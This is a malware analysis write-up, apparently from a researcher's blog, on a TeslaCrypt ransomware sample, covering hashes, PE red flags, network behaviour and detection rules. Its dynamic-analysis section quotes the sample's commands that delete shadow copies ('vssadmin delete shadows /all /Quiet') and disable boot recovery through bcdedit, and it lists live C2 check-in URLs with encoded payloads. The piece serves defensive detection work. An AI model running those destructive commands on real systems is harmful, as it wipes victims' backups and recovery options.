Source: VirusShare Malware Family: Ransomware Trojan, TeslaCrypt 2.2.2 Static Analysis Tools: pestudio, Immunity Debugger, CFF Explorer, PEID, BinText, IDA Pro Dynamic Analysis Tools: pexplorer, ProcMon, RegShot, ProcDump, Autoruns, Wireshark, Sandboxie, ApateDNS, netcat, VMWare (Windows XP SP1) Reports: (1) TotalHash: https://totalhash.cymru.com/analysis/?a8c986ae2083e8510429be9c3a7cf8c98a5ec8d0 (2) VirusTotal: https://www.virustotal.com/en/file/6b3ffc56dc48dd4e0878e2c741666ce5df5de92210cb28709b6b468afe27a27e/analysis/1450551677/ I . Static Analysis: d62c66750363a910542c39b2d726c656.exe Name: d62c66750363a910542c39b2d726c656.exe File Type: Win32 EXE Target machine: Intel 386 or later processors and compatible processors Compilation Timestamp: 2015-12-08 16:11:48 Entry Point: 0x0000881C Number of Sections: 5 MD5: d62c66750363a910542c39b2d726c656 SHA256: 6b3ffc56dc48dd4e0878e2c741666ce5df5de92210cb28709b6b468afe27a27e File size: 328.0 KB (335872 bytes) Anti-Virus Detection Ratio: 42 / 54 Finding Dependencies (Imports): [1] COMCTL32.dll (Common Control library) [2] COMDLG32.dll (Common Dialog Box Library; contains a set of dialog boxes for performing common application tasks, such as opening files, choosing color values, and printing documents.) [3] GDI32.dll [4] KERNEL32.dll [5] SHELL32.dll [6] USER32.dll Number of PE resources by language AZERI CYRILLIC Red Flags: *The section (name:.dfgfdds) is blacklisted according to VirusTotal. *The address of the entry point (0x0000881C) is outside the first section. *The file references the Desktop window. *The file queries for visible/invisible window. *The file ignores Data Execution Prevention (DEP) as mitigation technique. *The file ignores Address Space Layout Randomization (ASLR) as mitigation technique. *The file has no Version. *The file is not signed with a Digital Certificate. Interesting Strings: II. Dynamic Analysis: I. Opened and wrote the following files:
II. Performed the following HTTP requests: (A) URL: http://myexternalip.com/raw TYPE: GET USER AGENT: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko URL: http://graysonacademy.com/media/misc.php?BD97E05C5CD5AF42027F547B7C65D8FB2BFC9F3391F403215B5492589992FA52FAF7BF9A36AB689CB1224A080B24CE4AACB20A3E804E516C1B9664CDA274FE6AD982F9F6C312D1654BB59940DE84668C085EB6186888FD225F9A50A0EB511B812F8BBA4A2628229116AFC4CFB5B9FEED494AEE70D078D95C8105EC3DBCF6148115876D6099F96ACDD824E33A04BCBCCE868F1B13F038022071F3D478AFE1325B250A4B6424409F34D7326DBFC1A37FB5FB0614FE678A03DE38CEA8D919B65B87E1A3F31904B7E9767805C8826663296B1EEF63A0478529A42E5F3ECBF876E84A9B9DD2FEAD7712EB5FB9EBC2F2DCCE0F0DEFF76DA7334BFC9CEDB98B47F8772DA7D6441442895944DF0B3F0B9A6C8D8391A5113E1EB96A1046EAC9C3315F8CEE5120F394F688026D1593073AC8BE371CBD54954EDA3191E74A70B67459538698F9308AF3C87487F14378C9DD5A23D7595BCEBCF16587CEFD6BA380E5B7FD1E48 TYPE: GET USER AGENT: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko (B) URL: http://crown.essaudio.pl/media/misc.php?BD97E05C5CD5AF42027F547B7C65D8FB2BFC9F3391F403215B5492589992FA52FAF7BF9A36AB689CB1224A080B24CE4AACB20A3E804E516C1B9664CDA274FE6AD982F9F6C312D1654BB59940DE84668C085EB6186888FD225F9A50A0EB511B812F8BBA4A2628229116AFC4CFB5B9FEED494AEE70D078D95C8105EC3DBCF6148115876D6099F96ACDD824E33A04BCBCCE868F1B13F038022071F3D478AFE1325B250A4B6424409F34D7326DBFC1A37FB5FB0614FE678A03DE38CEA8D919B65B87E1A3F31904B7E9767805C8826663296B1EEF63A0478529A42E5F3ECBF876E84A9B9DD2FEAD7712EB5FB9EBC2F2DCCE0F5D129EECB99FD6206DC168BFCFC7E54065C478948A4B140F5F8B9A7D0596838D99FCB13C8B12408F146910C3D40FD444D96A708446651151FA7F613DB42774DD19AB6735DA40884EA9157E72A164C5070D904E51AA3B297F820B018AE8D4C3893FDEA29CE3056062F3722CE838DABF69 TYPE: GET USER AGENT: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko (C) URL: http://gjesdalbrass.no/media/misc.php?BD97E05C5CD5AF42027F547B7C65D8FB2BFC9F3391F403215B5492589992FA52FAF7BF9A36AB689CB1224A080B24CE4AACB20A3E804E516C1B9664CDA274FE6AD982F9F6C312D1654BB59940DE84668C085EB6186888FD225F9A50A0EB511B812F8BBA4A2628229116AFC4CFB5B9FEED494AEE70D078D95C8105EC3DBCF6148115876D6099F96ACDD824E33A04BCBCCE868F1B13F038022071F3D478AFE1325B250A4B6424409F34D7326DBFC1A37FB5FB0614FE678A03DE38CEA8D919B65B87E1A3F31904B7E9767805C8826663296B1EEF63A0478529A42E5F3ECBF876E84A9B9DD2FEAD7712EB5FB9EBC2F2DCCE0F5D129EECB99FD6206DC168BFCFC7E540B2502959FA5144F1B0BDA1D2C14078370B14D7F5530E6F5BD82037CA4B071C72E93312410DD5DF66AE01D70000EEEF88D48C5C724623AD0892E85FE8EFF6E504B27AE95041B76547F3ED08DB3139BC86B3AB919FC8A4EB121434E55CB997C2A7 TYPE: GET USER AGENT: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko III. Performed the following DNS requests: myexternalip.com (78.47.139.102) graysonacademy.com (173.201.96.1) crown.essaudio.pl (89.161.139.233) gjesdalbrass.no (83.143.81.14) IV. Deleted the following file: C:\Documents and Settings\<USER>\Application Data\wqkdy-bc.exe:Zone.Identifier V. Created processes bcdedit.exe /set {current} bootems off C:\WINDOWS\system32\vssadmin.exe C:\WINDOWS\system32\vssadmin.exe" delete shadows /all /Quiet " bcdedit.exe /set {current} advancedoptions off bcdedit.exe /set {current} optionsedit off bcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailures bcdedit.exe /set {current} recoveryenabled off VI. Issued the following Shell command: (open) vssadmin.exe delete shadows /all /Quiet VII. Created the following mutexes: AMResourceMutex2 VideoRenderer 2134-1234-1324-2134-1324-2134 RasPbFile 3. Yara Signature: rule Win32_TeslaCrypt : Ransom { meta: author = "Vitali Kremez" date = "2015-12-19" description = "TeslaCrypt Ransom" hash0 = "d62c66750363a910542c39b2d726c656" sample_filetype = "exe" strings: $service_name = “bcdedit.exe” $service_name = "vssadmin.exe" $string0 = "this is for you..." $string1 = "urn:schemas-microsoft-com:asm.v3" $string2 = "ABCDEFGHIJKLMNOPQRSTUVWXYZ" $string3 = "(null)" wide $string4 = "XYksR-c" $string5 = "kmWm-y" $string6 = "mcQN;X" $string7 = "Wky;xL" $string8 = "%s%WPQR]VqP%" $string9 = "NieNSs" $string10 = "TvyxywYYS" $string11 = "vqwYWx" $string12 = "LqsPKu" $string13 = "--ZYsv;W" $string14 = "PKa[uPMKM" $string15 = "M%wQK[" $string16 = "PyyeRRm;" $string17 = "KYkkgx" $string18 = "]eiZgc]" condition: 4 of them and any of ($service*) and filesize<330KB } Sourcefire Rule alert tcp $HOME_NET any -> any 80 (msg: "TESLACRYPT RANSOMWARE ALERT"; pcre:"\BD97E05C5CD5AF42027F547B7C65D8FB2BFC9F3391F403215B5492589992FA52FAF7BF9A36AB689CB1224A080B24CE4AACB20A3E804E516C1B9664CDA274FE6AD982F9F6C312D1654BB59940DE84668C085EB6186888FD225F9A50A0EB511B812F8BBA4A2628229116AFC4CFB5B9FEED494AEE70D078D95C8105EC3DBCF6148115876D6099F96ACDD824E33A04BCBCCE868F1B13F038022071F3D478AFE1325B250A4B6424409F34D7326DBFC1A37FB5FB0614FE678A03DE38CEA8D919B65B87E1A3F31904B7E9767805C8826663296B1EEF63A0478529A42E5F3ECBF876E84A9B9DD2FEAD7712EB5FB9EBC2F2DCCE0F0DEFF76DA7334BFC9CEDB98B47F8772DA7D6441442895944DF0B3F0B9A6C8D8391A5113E1EB96A1046EAC9C3315F8CEE5120F394F688026D1593073AC8BE371CBD54954EDA3191E74A70B67459538698F9308AF3C87487F14378C9DD5A23D7595BCEBCF16587CEFD6BA380E5B7FD1E48\"; "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko"; noncase; flow: to_server; classtype: Trojan-activity)
0 Comments
Leave a Reply. |
AuthorVitali Kremez Archives
September 2016
Categories |